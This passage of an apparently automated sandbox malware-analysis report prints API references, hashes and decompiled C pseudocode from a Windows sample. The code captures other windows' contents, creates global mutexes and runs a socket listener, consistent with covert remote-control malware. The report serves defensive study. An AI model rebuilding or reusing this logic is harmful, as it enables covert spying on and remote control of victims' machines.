    • select.WS2_32(00000000,?,00000000,00000000,00007531), ref: 00414CC0
    • recv.WS2_32(00000104,?,00000001,00000000), ref: 00414CD0
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: recvselect
    • String ID:
    • API String ID: 741273618-0
    • Opcode ID: c5c604b8d716835f0f014b34ffa609f796aa81662f78c12c5ac338a8a61a655d
    • Instruction ID: 535ffc7b278af656be3e0e49c16c5856d713cc136f28e9798933aef5c9ea174e
    • Opcode Fuzzy Hash: c5c604b8d716835f0f014b34ffa609f796aa81662f78c12c5ac338a8a61a655d
    • Instruction Fuzzy Hash: D2112B325053045BD7348E24ED46BEFB7A9EBC1710F05863BE4159A2C0E779D6888BC9
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • GetTimeZoneInformation.KERNEL32(00000000), ref: 0041096A
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    • Opcode ID: efa15127a66dc56a35fd09492d3f40f31a982295e21f84e2774c37a9e49f9d77
    • Instruction ID: 81dfcb3c4164417901333f5f42cda3c60566e4e87eaa59e29eaa24b6892b81a8
    • Opcode Fuzzy Hash: efa15127a66dc56a35fd09492d3f40f31a982295e21f84e2774c37a9e49f9d77
    • Instruction Fuzzy Hash: AAE08630754201CBFB34D6A4DD95BBAB3D4A781310F944939D4D6C2340E3ACD9D68643
    Uniqueness

    Uniqueness Score: -1.00%


    C-Code - Quality: 95%
    			E0041B6E0(RECT* __eax, void* __eflags, struct HWND__* _a8, char _a12) {
    				intOrPtr _v0;
    				struct HWND__* _v28;
    				intOrPtr _v36;
    				intOrPtr _v52;
    				struct tagWINDOWINFO _v60;
    				int _v76;
    				intOrPtr _v80;
    				intOrPtr _v84;
    				struct tagPOINT* _v88;
    				struct tagPOINT* _v92;
    				struct HDC__* _v96;
    				intOrPtr _v100;
    				void _v104;
    				struct tagRECT _v120;
    				char _v124;
    				struct tagRECT _v140;
    				struct tagPOINT* _v144;
    				signed int _v148;
    				struct tagPOINT* _v152;
    				signed int _v154;
    				int _v156;
    				int _v160;
    				int _v164;
    				char _v165;
    				char _v166;
    				int _v168;
    				intOrPtr _v177;
    				char _v193;
    				signed int _t110;
    				signed int _t116;
    				signed char _t121;
    				int _t125;
    				char _t128;
    				int _t131;
    				signed int _t143;
    				int _t157;
    				signed int _t171;
    				intOrPtr _t172;
    				long _t173;
    				intOrPtr _t176;
    				long _t177;
    				signed int _t182;
    				signed int _t183;
    				int _t184;
    				long _t198;
    				long _t199;
    				long _t200;
    				long _t201;
    				struct HWND__* _t219;
    				struct HDC__* _t221;
    				int _t223;
    				int _t224;
    				RECT* _t225;
    				struct HDC__* _t226;
    				void* _t228;
    				struct HWND__* _t230;
    
    				_t219 = _a8;
    				_t225 = __eax;
    				_t110 = E004260D0(_t219) & 0x0000ffff;
    				_v148 = _t110;
    				if((_t110 & 0x00000001) == 0) {
    					if(_t110 == 0) {
    						_v148 = 2;
    						_t110 = _v148;
    					}
    					if(_a12 != 0 && (_t110 & 0x00000002) != 0) {
    						_v148 = _t110 & 0x0000fffd | 0x00000008;
    					}
    					_v144 = 0;
    					_v152 = 0;
    					_v140.left = 0;
    					_v140.top = 0;
    					_v60.cbSize = 0x3c;
    					if(GetWindowInfo(_t219,  &_v60) == 0) {
    						L28:
    						return 0;
    					} else {
    						_t183 = _t182 & 0xffffff00 | IntersectRect( &(_v140.bottom),  &(_v60.rcWindow), _t225) != 0x00000000;
    						if(_t183 != 0) {
    							_t200 = _t225->top;
    							_t176 = _v52;
    							if(_t176 < _t200) {
    								_v152 = _t176 - _t200;
    							}
    							_t201 = _t225->left;
    							_t177 = _v60.rcWindow.left;
    							if(_t177 < _t201) {
    								_v144 = _t177 - _t201;
    							}
    						}
    						_t116 = _v148 & 0x00000002;
    						_v120.right = _t116;
    						if(_t116 == 0) {
    							_v154 = _t183;
    						} else {
    							if((_v60.dwStyle & 0x20000000) == 0) {
    								_t171 = IntersectRect( &(_v120.bottom),  &(_v60.rcClient), _t225) & 0xffffff00 | _t170 != 0x00000000;
    								_v154 = _t171;
    								if(_t171 != 0) {
    									_t198 = _t225->top;
    									_t172 = _v36;
    									if(_t172 < _t198) {
    										_v140.top = _t172 - _t198;
    									}
    									_t199 = _t225->left;
    									_t173 = _v60.rcClient.left;
    									if(_t173 < _t199) {
    										_v140.left = _t173 - _t199;
    									}
    								}
    							} else {
    								_v154 = 0;
    							}
    						}
    						if(_t183 != 0 || _v154 != _t183) {
    							_t221 = GetDC(0);
    							if(_t221 == 0) {
    								goto L28;
    							} else {
    								_t226 = CreateCompatibleDC(_t221);
    								ReleaseDC(0, _t221);
    								if(_t226 == 0) {
    									goto L28;
    								} else {
    									_t222 = _v0;
    									_t228 = SelectObject(_t226,  *(_v0 + 0x1c));
    									_v144 = _t228;
    									if(_t228 != 0) {
    										_v165 = 1;
    										if(_v124 == 0) {
    											_t121 = _v160;
    											if((_t121 & 0x00000004) == 0) {
    												if((_t121 & 0x00000008) != 0) {
    													_t125 = _v156;
    													if(_t125 != 0 || _v164 != 0) {
    														SetViewportOrgEx(_t226, _t125, _v164, 0);
    													}
    													_t128 = E0041B5B0(_t222,  &_v156, 0);
    													__imp__PrintWindow(_v60.dwStyle, _t226, 0);
    													if(_t128 != 0) {
    														goto L56;
    													} else {
    														_v193 = _t128;
    													}
    												}
    											} else {
    												_t131 = _v156;
    												if(_t131 != 0 || _v164 != 0) {
    													SetViewportOrgEx(_t226, _t131, _v164, 0);
    												}
    												E0041B5B0(_t222,  &_v156, 0);
    												DefWindowProcW(_v60.dwStyle, 0x317, _t226, 0xe);
    												L56:
    												E0041B5B0(_t222,  &_v168, 1);
    											}
    										} else {
    											_v92 = 0;
    											_v88 = 0;
    											_v100 = _v60.atomWindowType;
    											_v84 = _v120.right - _v120.left;
    											_v96 = _t226;
    											_v76 = 1;
    											_v80 = _v120.bottom.left - _v120.top;
    											TlsSetValue( *0x42eea4,  &_v104);
    											if(_t183 == 1 && EqualRect( &_v120,  &_v140) == 0) {
    												_t224 = SaveDC(_t226);
    												_t157 = _v160;
    												if(_t157 != 0 || _v168 != _t157) {
    													SetViewportOrgEx(_t226, _t157, _v168, 0);
    												}
    												_t185 = _v28;
    												E0041B5B0(_v28,  &_v160, 0);
    												_v140.bottom.left = 0;
    												SendMessageW(_v28, 0x85, 1, 0);
    												if(_v140.bottom.left == 0) {
    													DefWindowProcW(_v60.dwStyle, 0x317, _t226, 2);
    												}
    												E0041B5B0(_t185,  &_v160, 1);
    												RestoreDC(_t226, _t224);
    											}
    											if(_v166 == 1) {
    												if(_v152 != 0 || _v148 != 0) {
    													_t184 = 1;
    												} else {
    													_t184 = 0;
    												}
    												_t223 = SaveDC(_t226);
    												if(_t184 != 0) {
    													SetViewportOrgEx(_t226, _v156, _v152, 0);
    												}
    												E0041B5B0(_v60.cxWindowBorders,  &_v124, 0);
    												_t230 = _v60.cxWindowBorders;
    												_t143 = SendMessageW(_t230, 0x14, _t226, 0);
    												asm("sbb eax, eax");
    												_v84 =  ~_t143 + 1;
    												RestoreDC(_t226, _t223);
    												if(_t184 != 0) {
    													SetViewportOrgEx(_t226, _v164, _v160, 0);
    												}
    												_v120.top = 0;
    												SendMessageW(_t230, 0xf, 0, 0);
    												if(_v120.top == 0) {
    													DefWindowProcW(_t230, 0x317, _t226, 4);
    												}
    												E0041B5B0(_v60.dwExStyle,  &(_v140.right), 1);
    											}
    											TlsSetValue( *0x42eea4, 0);
    											_t228 = _v144;
    										}
    										SelectObject(_t226, _t228);
    										DeleteDC(_t226);
    										return _v177;
    									} else {
    										DeleteDC(_t226);
    										goto L28;
    									}
    								}
    							}
    						} else {
    							goto L1;
    						}
    					}
    				} else {
    					L1:
    					return 1;
    				}
    			}


    APIs
      • Part of subcall function 004260D0: GetClassNameW.USER32 ref: 004260E5
    • GetWindowInfo.USER32 ref: 0041B75F
    • IntersectRect.USER32 ref: 0041B77E
    • GetDC.USER32(00000000), ref: 0041B824
    • CreateCompatibleDC.GDI32(00000000), ref: 0041B831
    • ReleaseDC.USER32 ref: 0041B83B
    • SelectObject.GDI32(00000000,00000001), ref: 0041B851
    • DeleteDC.GDI32(00000000), ref: 0041B864
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ClassCompatibleCreateDeleteInfoIntersectNameObjectRectReleaseSelectWindow
    • String ID: <
    • API String ID: 641381948-4251816714
    • Opcode ID: c58f1be9aedeb7d7553343e3c96d7239b5d02985e06730e3a023ab0fac3322c2
    • Instruction ID: 64208ebbec11a43df5f580f43a37667e0e1a0976137c7c29a6c72b264bc0b616
    • Opcode Fuzzy Hash: c58f1be9aedeb7d7553343e3c96d7239b5d02985e06730e3a023ab0fac3322c2
    • Instruction Fuzzy Hash: 24C18F712083409FD320DF25C944BABBBE9EF89744F04491EF68597360D778D985CBAA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0041AC10(void* __ecx, void* __edx, void* __eflags) {
    				char _v64;
    				void* _v68;
    				void* _v72;
    				void* _v76;
    				void* _v80;
    				long _v84;
    				void* _v88;
    				void* _v92;
    				void* _v96;
    				void* _v100;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t56;
    				long _t60;
    				long _t62;
    				void* _t66;
    				void* _t69;
    				void* _t70;
    				void* _t72;
    				void* _t73;
    				void* _t75;
    				void* _t76;
    				void* _t77;
    				long _t78;
    				void _t82;
    				void* _t83;
    				void* _t84;
    				void* _t85;
    				void* _t86;
    				void* _t87;
    				void* _t94;
    				char* _t101;
    				void* _t103;
    				void* _t105;
    				void* _t106;
    				void* _t107;
    				void* _t112;
    				void* _t113;
    				void* _t114;
    				void* _t122;
    				void* _t132;
    				void* _t137;
    				void* _t138;
    				void* _t139;
    				void* _t141;
    				void* _t143;
    				void* _t144;
    				void* _t145;
    				WCHAR* _t146;
    				void* _t147;
    				void* _t148;
    				void* _t149;
    				void* _t150;
    				void* _t156;
    				void** _t158;
    
    				_t158 =  &_v100;
    				_t103 = E0041CDD0(__eflags, 0x743c1521, 2);
    				_v76 = _t103;
    				if(_t103 != 0) {
    					SetThreadPriority(GetCurrentThread(), 0xfffffff1);
    					_t56 = WaitForSingleObject( *0x42edbc, 0);
    					__eflags = _t56;
    					if(_t56 != 0) {
    						_t60 = WaitForSingleObject( *0x42edbc, 0xea60);
    						__eflags = _t60 - 0x102;
    						if(_t60 == 0x102) {
    							do {
    								_t141 = E0040C250();
    								_v72 = _t141;
    								__eflags = _t141;
    								if(_t141 != 0) {
    									_t132 = E00418BD0(2, 0x20000000, _t141);
    									__eflags = _t132;
    									if(_t132 != 0) {
    										_t105 = E00418C20(_t132);
    										_v76 = _t105;
    										__eflags = _t105;
    										if(_t105 != 0) {
    											_t66 = E0041A630(_t65,  *((intOrPtr*)(_t132 + 0xc)));
    											__eflags = _t66;
    											if(_t66 != 0) {
    												_v92 = _t105;
    												while(1) {
    													_t7 = _t105 + 1; // 0x1
    													_t122 = _t7;
    													_t143 = 0;
    													_t112 = 0;
    													__eflags = 0;
    													_v80 = _t122;
    													_t69 = _t122;
    													while(1) {
    														L11:
    														__eflags =  *((char*)(_t69 - 1));
    														if( *((char*)(_t69 - 1)) != 0) {
    															goto L14;
    														}
    														L12:
    														__eflags =  *_t69;
    														if( *_t69 == 0) {
    															_v96 = _t143;
    														} else {
    															_t112 = _t112 + 1;
    															__eflags = _t112 - 1;
    															if(_t112 == 1) {
    																_v96 = _t69;
    															} else {
    																goto L14;
    															}
    														}
    														_t113 = 0;
    														__eflags = 0;
    														_t70 = _t122;
    														while(1) {
    															__eflags =  *((char*)(_t70 - 1));
    															if( *((char*)(_t70 - 1)) != 0) {
    																goto L21;
    															}
    															L19:
    															__eflags =  *_t70;
    															if( *_t70 == 0) {
    																_v100 = _t143;
    															} else {
    																_t113 = _t113 + 1;
    																__eflags = _t113 - 2;
    																if(_t113 == 2) {
    																	_v100 = _t70;
    																} else {
    																	goto L21;
    																}
    															}
    															__eflags = _t105 - _t143;
    															if(_t105 != _t143) {
    																__eflags =  *_t105;
    																if( *_t105 != 0) {
    																	do {
    																		_t143 = _t143 + 1;
    																		__eflags =  *((char*)(_t143 + _t105));
    																	} while ( *((char*)(_t143 + _t105)) != 0);
    																}
    															}
    															_t156 = E00412560(_v92, _t143);
    															_t72 = _v96;
    															_t144 = 0;
    															__eflags = _t72;
    															if(_t72 != 0) {
    																__eflags =  *_t72;
    																if( *_t72 != 0) {
    																	do {
    																		_t144 = _t144 + 1;
    																		__eflags =  *((char*)(_t144 + _t72));
    																	} while ( *((char*)(_t144 + _t72)) != 0);
    																}
    															}
    															_t73 = E00412560(_v96, _t144);
    															_t145 = 0;
    															_t106 = _t73;
    															__eflags = _v100;
    															if(_v100 != 0) {
    																_t101 = _v100;
    																__eflags =  *_t101;
    																if( *_t101 != 0) {
    																	do {
    																		_t145 = _t145 + 1;
    																		__eflags =  *((char*)(_t145 + _t101));
    																	} while ( *((char*)(_t145 + _t101)) != 0);
    																}
    															}
    															_push(E00412560(_v100, _t145));
    															_push(_t106);
    															_push(_t156);
    															_t146 =  &_v64;
    															_t75 = E00411D10(_t74, 0x20, _t146, L"Global\\%08X%08X%08X");
    															_t158 =  &(_t158[4]);
    															__eflags = _t75 - 0x1f;
    															if(_t75 == 0x1f) {
    																_t77 = CreateMutexW(0x42e930, 1, _t146);
    																_v88 = _t77;
    																__eflags = _t77;
    																if(_t77 != 0) {
    																	_t78 = GetLastError();
    																	__eflags = _t78 - 0xb7;
    																	if(_t78 != 0xb7) {
    																		_t107 = HeapAlloc( *0x42e6d4, 8, 0x14);
    																		__eflags = _t107;
    																		if(_t107 == 0) {
    																			L75:
    																			_t147 = _v88;
    																			ReleaseMutex(_t147);
    																			_push(_t147);
    																			goto L76;
    																		} else {
    																			_t137 = _v92;
    																			__eflags = _t137;
    																			if(_t137 != 0) {
    																				_t148 = 0;
    																				__eflags =  *_t137;
    																				if( *_t137 != 0) {
    																					do {
    																						_t148 = _t148 + 1;
    																						__eflags =  *((char*)(_t148 + _t137));
    																					} while ( *((char*)(_t148 + _t137)) != 0);
    																				}
    																				_t29 = _t148 + 1; // 0x2
    																				_t82 = _t29;
    																				__eflags = _t82;
    																				if(_t82 != 0) {
    																					_t82 = HeapAlloc( *0x42e6d4, 8, _t82 + 4);
    																					__eflags = _t82;
    																					if(_t82 != 0) {
    																						_t82 = E00410820(_t82, _t137, _t148);
    																					}
    																				}
    																			} else {
    																				_t82 = 0;
    																			}
    																			_t138 = _v96;
    																			 *_t107 = _t82;
    																			__eflags = _t138;
    																			if(_t138 != 0) {
    																				_t149 = 0;
    																				__eflags =  *_t138;
    																				if( *_t138 != 0) {
    																					do {
    																						_t149 = _t149 + 1;
    																						__eflags =  *((char*)(_t149 + _t138));
    																					} while ( *((char*)(_t149 + _t138)) != 0);
    																				}
    																				_t32 = _t149 + 1; // 0x2
    																				_t83 = _t32;
    																				__eflags = _t83;
    																				if(_t83 != 0) {
    																					_t83 = HeapAlloc( *0x42e6d4, 8, _t83 + 4);
    																					__eflags = _t83;
    																					if(_t83 != 0) {
    																						_t83 = E00410820(_t83, _t138, _t149);
    																					}
    																				}
    																			} else {
    																				_t83 = 0;
    																			}
    																			_t139 = _v100;
    																			 *(_t107 + 4) = _t83;
    																			__eflags = _t139;
    																			if(_t139 != 0) {
    																				_t150 = 0;
    																				__eflags =  *_t139;
    																				if( *_t139 != 0) {
    																					do {
    																						_t150 = _t150 + 1;
    																						__eflags =  *((char*)(_t150 + _t139));
    																					} while ( *((char*)(_t150 + _t139)) != 0);
    																				}
    																				_t36 = _t150 + 1; // 0x2
    																				_t84 = _t36;
    																				__eflags = _t84;
    																				if(_t84 != 0) {
    																					_t84 = HeapAlloc( *0x42e6d4, 8, _t84 + 4);
    																					__eflags = _t84;
    																					if(_t84 != 0) {
    																						_t84 = E00410820(_t84, _t139, _t150);
    																					}
    																				}
    																			} else {
    																				_t84 = 0;
    																			}
    																			__eflags =  *_t107;
    																			 *(_t107 + 8) = _t84;
    																			 *((intOrPtr*)(_t107 + 0xc)) = _v88;
    																			if( *_t107 == 0) {
    																				L68:
    																				_t85 =  *_t107;
    																				__eflags = _t85;
    																				if(_t85 != 0) {
    																					HeapFree( *0x42e6d4, 0, _t85);
    																				}
    																				_t86 =  *(_t107 + 4);
    																				__eflags = _t86;
    																				if(_t86 != 0) {
    																					HeapFree( *0x42e6d4, 0, _t86);
    																				}
    																				_t87 =  *(_t107 + 8);
    																				__eflags = _t87;
    																				if(_t87 != 0) {
    																					HeapFree( *0x42e6d4, 0, _t87);
    																				}
    																				HeapFree( *0x42e6d4, 0, _t107);
    																				goto L75;
    																			} else {
    																				__eflags =  *(_t107 + 4);
    																				if( *(_t107 + 4) == 0) {
    																					goto L68;
    																				} else {
    																					__eflags = _t84;
    																					if(_t84 == 0) {
    																						goto L68;
    																					} else {
    																						_t94 = CreateThread(0, 0x80000, E0041A850, _t107, 0,  &_v84);
    																						__eflags = _t94;
    																						if(_t94 == 0) {
    																							goto L68;
    																						} else {
    																							CloseHandle(_t94);
    																							__eflags = _v88;
    																							if(_v88 <= 0) {
    																								goto L68;
    																							}
    																						}
    																					}
    																				}
    																			}
    																		}
    																	} else {
    																		_push(_v88);
    																		L76:
    																		CloseHandle();
    																	}
    																}
    															}
    															_t76 = _v80;
    															_t114 = 0;
    															__eflags = 0;
    															while(1) {
    																__eflags =  *((char*)(_t76 - 1));
    																if( *((char*)(_t76 - 1)) != 0) {
    																	goto L81;
    																}
    																L79:
    																__eflags =  *_t76;
    																if( *_t76 != 0) {
    																	_t114 = _t114 + 1;
    																	__eflags = _t114 - 3;
    																	if(_t114 == 3) {
    																		_v92 = _t76;
    																		_t105 = _t76;
    																		_t7 = _t105 + 1; // 0x1
    																		_t122 = _t7;
    																		_t143 = 0;
    																		_t112 = 0;
    																		__eflags = 0;
    																		_v80 = _t122;
    																		_t69 = _t122;
    																		L11:
    																		__eflags =  *((char*)(_t69 - 1));
    																		if( *((char*)(_t69 - 1)) != 0) {
    																			goto L14;
    																		}
    																		goto L12;
    																	} else {
    																		goto L81;
    																	}
    																}
    																goto L83;
    																L81:
    																_t76 = _t76 + 1;
    																__eflags =  *((char*)(_t76 - 1));
    																if( *((char*)(_t76 - 1)) != 0) {
    																	goto L81;
    																}
    																goto L79;
    															}
    															L21:
    															_t70 = _t70 + 1;
    															__eflags =  *((char*)(_t70 - 1));
    															if( *((char*)(_t70 - 1)) != 0) {
    																goto L21;
    															}
    															goto L19;
    														}
    														L14:
    														_t69 = _t69 + 1;
    													}
    												}
    											}
    											L83:
    											HeapFree( *0x42e6d4, 0, _v76);
    											_t141 = _v72;
    										}
    									}
    									HeapFree( *0x42e6d4, 0, _t141);
    									_t103 = _v68;
    								}
    								_t62 = WaitForSingleObject( *0x42edbc, 0xea60);
    								__eflags = _t62 - 0x102;
    							} while (_t62 == 0x102);
    						}
    					}
    					ReleaseMutex(_t103);
    					CloseHandle(_t103);
    					__eflags = 0;
    					return 0;
    				} else {
    					_t2 = _t103 + 1; // 0x1
    					return _t2;
    				}
    			}

    APIs
      • Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
      • Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
      • Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39
    • GetCurrentThread.KERNEL32 ref: 0041AC37
    • SetThreadPriority.KERNEL32(00000000,?,743C1521,00000002), ref: 0041AC3E
    • WaitForSingleObject.KERNEL32(?,00000000,?,743C1521,00000002), ref: 0041AC52
    • WaitForSingleObject.KERNEL32(?,0000EA60,?,743C1521,00000002), ref: 0041AC68
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: ObjectSingleWait$Thread$CloseCreateCurrentHandleMutexPriority
    • String ID: Global\%08X%08X%08X
    • API String ID: 3192181034-3239447729
    • Opcode ID: 5ec1dfd168cf881e30e68d6ee939cfd63e9930cf43f89443a4970bb87441ca1e
    • Instruction ID: a1a078a3edac850bf5601f71e49d0461410788ac144138eb2557eb6316941d36
    • Opcode Fuzzy Hash: 5ec1dfd168cf881e30e68d6ee939cfd63e9930cf43f89443a4970bb87441ca1e
    • Instruction Fuzzy Hash: 21B113B0645341AFD721CB60DC84BA777D9AB98700F14082EF941E7291D738DCD2C7AA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 45%
    			E00407050(void* __ecx, void* __edx, void* __eflags) {
    				intOrPtr _v78;
    				signed int _v82;
    				char _v124;
    				char _v128;
    				char _v132;
    				void* _v140;
    				void* _v144;
    				void* _v152;
    				void* _v156;
    				char _v160;
    				void* _v164;
    				char _v168;
    				void* _v176;
    				long _v180;
    				long _v192;
    				int _v196;
    				long _v228;
    				void* _v232;
    				intOrPtr _v260;
    				void* __edi;
    				void* __esi;
    				void* _t54;
    				void* _t62;
    				void* _t63;
    				long _t65;
    				intOrPtr _t69;
    				void* _t70;
    				void* _t76;
    				long _t79;
    				void* _t85;
    				intOrPtr* _t87;
    				intOrPtr* _t110;
    				void* _t113;
    				signed int _t115;
    				long _t116;
    				char _t117;
    				char _t118;
    				void* _t119;
    				intOrPtr* _t123;
    				signed int _t125;
    				void* _t127;
    
    				_t127 = (_t125 & 0xfffffff8) - 0xb0;
    				_push(_t113);
    				_t85 = E0041CDD0(__eflags, 0x743c152e, 2);
    				_v156 = _t85;
    				if(_t85 != 0) {
    					_t54 = WaitForSingleObject( *0x42edbc, 0);
    					__eflags = _t54;
    					if(_t54 != 0) {
    						E0041A440(_t113,  &_v124);
    						_push( &_v168);
    						_t115 = E00406D40(_v78,  &_v160) & 0x0000ffff;
    						__eflags = _t115;
    						if(_t115 != 0) {
    							L8:
    							__eflags = _t115 - _v78;
    							if(_t115 != _v78) {
    								E0041A520( &_v128);
    								_v82 = _t115;
    								E0041A5C0( &_v132);
    							}
    							_t62 = _v156;
    							_t116 = 1;
    							_v144 =  *0x42edbc;
    							_v180 = 1;
    							__eflags = _t62;
    							if(_t62 != 0) {
    								_v180 = 2;
    								_t116 = _v180;
    								_v140 = _t62;
    							}
    							_t63 = _v164;
    							__eflags = _t63;
    							if(_t63 != 0) {
    								 *(_t127 + 0x38 + _t116 * 4) = _t63;
    								_t116 = _t116 + 1;
    								__eflags = _t116;
    								_v180 = _t116;
    							}
    							_t65 = WaitForMultipleObjects(_t116,  &_v144, 0, 0xffffffff);
    							__eflags = _t65;
    							if(_t65 != 0) {
    								_t110 = __imp__WSAEventSelect;
    								_t87 = __imp__WSAIoctl;
    								_t123 = __imp__#21;
    								while(1) {
    									__eflags = _t65 - _t116;
    									if(_t65 >= _t116) {
    										break;
    									}
    									_t69 =  *((intOrPtr*)(_t127 + 0x38 + _t65 * 4));
    									__eflags = _t69 - _v156;
    									if(_t69 != _v156) {
    										__eflags = _t69 - _v164;
    										if(_t69 == _v164) {
    											_v176 = _v168;
    										}
    									} else {
    										_v176 = _v160;
    									}
    									_t70 = _v176;
    									__imp__#1(_t70, 0, 0);
    									_t119 = _t70;
    									__eflags = _t119 - 0xffffffff;
    									while(_t119 != 0xffffffff) {
    										 *_t110(_t119, 0, 0);
    										_v196 = 0;
    										 *_t87(_t119, 0x8004667e,  &_v196, 4, 0, 0,  &_v156, 0, 0);
    										_v232 = 1;
    										 *_t123(_t119, 6, 1,  &_v232, 4);
    										_t76 = CreateThread(0, 0x20000, E00406F20, _t119, 0,  &_v228);
    										__eflags = _t76;
    										if(_t76 == 0) {
    											L25:
    											__eflags = _t119 - 0xffffffff;
    											if(_t119 != 0xffffffff) {
    												__imp__#22(_t119, 2);
    												__imp__#3(_t119);
    											}
    										} else {
    											_t76 = CloseHandle(_t76);
    											__eflags = _v232;
    											if(_v232 == 0) {
    												goto L25;
    											}
    										}
    										__imp__#1(_v260, 0, 0);
    										_t119 = _t76;
    										__eflags = _t119 - 0xffffffff;
    									}
    									_t65 = WaitForMultipleObjects(_v192,  &_v156, 0, 0xffffffff);
    									__eflags = _t65;
    									if(_t65 != 0) {
    										_t116 = _v192;
    										continue;
    									}
    									break;
    								}
    								_t85 = _v152;
    							}
    							_t117 = _v160;
    							__eflags = _t117 - 0xffffffff;
    							if(_t117 != 0xffffffff) {
    								__imp__#22(_t117, 2);
    								__imp__#3(_t117);
    							}
    							CloseHandle(_v156);
    							_t118 = _v168;
    							__eflags = _t118 - 0xffffffff;
    							if(_t118 != 0xffffffff) {
    								__imp__#22(_t118, 2);
    								__imp__#3(_t118);
    							}
    							CloseHandle(_v164);
    						} else {
    							while(1) {
    								_t79 = WaitForSingleObject( *0x42edbc, 0x3e8);
    								__eflags = _t79 - 0x102;
    								if(_t79 != 0x102) {
    									break;
    								}
    								_push( &_v168);
    								_t115 = E00406D40(_v78,  &_v160) & 0x0000ffff;
    								__eflags = _t115;
    								if(_t115 == 0) {
    									continue;
    								} else {
    									goto L8;
    								}
    								goto L36;
    							}
    							__eflags = _t115;
    							if(_t115 == 0) {
    								goto L35;
    							} else {
    								goto L8;
    							}
    						}
    					}
    					L36:
    					ReleaseMutex(_t85);
    					CloseHandle(_t85);
    					__eflags = 0;
    					return 0;
    				} else {
    					_t2 = _t85 + 1; // 0x1
    					return _t2;
    				}
    			}

    APIs
      • Part of subcall function 0041CDD0: CreateMutexW.KERNEL32(0042E930,00000000,?,?,?,?,?), ref: 0041CE18
      • Part of subcall function 0041CDD0: WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 0041CE27
      • Part of subcall function 0041CDD0: CloseHandle.KERNEL32(00000000), ref: 0041CE39
    • WaitForSingleObject.KERNEL32(?,00000000,743C152E,00000002), ref: 00407091
    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?), ref: 004070CF
    • WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF,?,?,?), ref: 00407166
    • accept.WS2_32(?,00000000,00000000), ref: 004071C7
    • WSAEventSelect.WS2_32(00000000,00000000,00000000), ref: 004071DD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.200969767.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.200956781.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.201020494.000000000042D000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.201038570.0000000000430000.00000002.00020000.sdmp
    Similarity
    • API ID: Wait$ObjectSingle$CloseCreateEventHandleMultipleMutexObjectsSelectaccept
    • String ID: p0u
    • API String ID: 268361317-1742372003
    • Opcode ID: f59204b01dd786d86b65e30aadce258c6abfa655c4586cb7d000de9a3bbed0dc
    • Instruction ID: 8262971fe96d87697c8d2cf5d2e263d8d35bee536380b65278ab02157ada572d
    • Opcode Fuzzy Hash: f59204b01dd786d86b65e30aadce258c6abfa655c4586cb7d000de9a3bbed0dc
    • Instruction Fuzzy Hash: 16718771609300ABD310DB64DC45F5BB7E8AB84754F100A2EFA55B72E0D774ED058BAB
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 87%
    			E00426210(void** __esi) {
    				intOrPtr _v24;
    				char _v712;
    				char _v828;
    				void* _v1162;
    				char _v1472;
    				char _v1600;
    				char _v1628;
    				char _v1704;
    				short _v1716;
    				char _v1736;
    				char _v1756;
    				short _v1768;
    				void* _t53;
    				long _t55;
    				int _t61;
    				void* _t68;
    				void* _t74;
    				void* _t77;
    				void* _t78;
    				int _t83;
    				void* _t85;
    				void* _t98;
    				struct HDC__* _t100;
    				void* _t102;
    				void* _t103;
    				int _t104;
    				signed char _t114;
    				signed int _t116;
    				struct HDC__* _t131;
    				struct HDC__* _t132;
    				void** _t133;
    
    				_t133 = __esi;
    				E00410870(_t53, __esi, 0, 0x18c);
    				_t55 = TlsAlloc();
    				__esi[1] = _t55;
    				if(_t55 != 0xffffffff) {
    					E0041D150( &_v1600);
    					E00416E10(0x42eb70,  &_v1472,  *0x42e904,  &_v1704, 0);
    					_t61 = RegisterWindowMessageW( &_v1716);
    					__esi[2] = _t61;
    					if(_t61 == 0) {
    						goto L1;
    					} else {
    						E0041D150( &_v1600);
    						E00416E10(0x42eb70,  &_v1472,  *0x42e904,  &_v1704, 1);
    						_t68 = CreateEventW(0x42e930, 1, 0,  &_v1716);
    						__esi[3] = _t68;
    						if(_t68 == 0) {
    							goto L1;
    						} else {
